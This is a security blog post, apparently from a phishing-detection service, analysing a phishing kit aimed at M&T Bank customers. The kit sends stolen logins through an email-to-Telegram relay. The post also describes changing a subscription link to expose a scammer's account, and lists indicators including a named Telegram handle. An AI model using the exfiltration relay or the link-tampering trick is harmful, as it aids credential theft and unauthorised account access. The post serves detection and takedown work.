By One of the latest kits downloaded by StalkPhish targets customers of the online bank M&T. It has a special feature that we wanted to share with you. We still blogged about the use of Telegram by scammers, but this kit present an interesting new trick.
First observations
As many, the archive of this kit has been left on the server by the scammer. We named this kit ‘xx‘ because the archive presents a xx.php file. This kit is only composed of 2 pages, a PHP file to process the collected data and an HTML file:
The HTML page has no specificities, the links to the original site are kept, as well as the images that are called from the original server, which makes it a particularly easy to detect phishing kit as long as the HTTP referers are monitored.
The collected data are then sent to the xx.php file:
Exfiltration script
The xx.php script looks similar to a lot of phishing kits, and more specifically to an existing M&T Bank NFL kit (see https://github.com/t4d/PhishingKit-Yara-Rules/blob/master/PK_MTB_NFL.yar):
What is particularly interesting here is the email address.
Using Telegram through email address
While many scammers usually use Gmail, Yandex, Yahoo, Protonmail, etc… email addresses, this actor uses an etlgr.com email address. This domain is used by a platform that offers to reroute data sent to an email address, to a Telegram bot:
You just have to launch, in your Telegram app, a conversation with the proposed bot, to generate an email address:
Once the email address generated, the attacker can then declare it in the exfiltration script to send the stolen data, via email, to the Telegram bot.
The bot, the service and the OpSec
The bot offers a help section with commands to configure the service and subscription, as you can see here:
One of the most interesting command is the subscription one, command you can use to retrieve informations about your account… or the scammer one! This command generate a subscription management link to the subscription page which use your ID account.
Then you can modify the link using the chat ID (in email address, the ID before the @etlgr.com) to have access to scammer’s informations:
We can observe several things here:
- the scammer purchased a one year subscription, which will expires on 2022-11-17
- you can pay using Bitcoin
- you can find a link to the subscriber Telegram profile page:
Then you can now continue your investigations on the scammer if you want to go further, but this is not the purpose of this post.
Search and destroy
In order to search for this type of kit you can use the StalkPhish.io API using the URL search and containing the string “Hajjjerr.htm” or “mbankss” (you can register on stalkphish.io for free here: https://stalkphish.io), then you will retrieve a list of URLs where those phishing kit was installed:
$ curl -H “authorization: Token YOUR_STALKPHISH.IO_API_TOKEN” https://api.stalkphish.io/api/v1/search/url/Hajjjjerr.htm|jq
Then you can start your takeover campaign!
IOCs
Kit’s zip file hash {SHA256}:
f43a06a42b87920c300929003787fc3c6a3b7f0fb7f0f97726c9f2f3f8c0dd80
Contact e-mail:
‘784320094\\\\@etlgr[.]com’
Associated scammer infos:
‘Don Dari’, ‘\\\\@dondarigh’, https[:]//t.me/dondarigh
PhishingKit Yara Rule:
PK_MTB_xx.yar
StalkPhish - phishing and brand impersonation detection 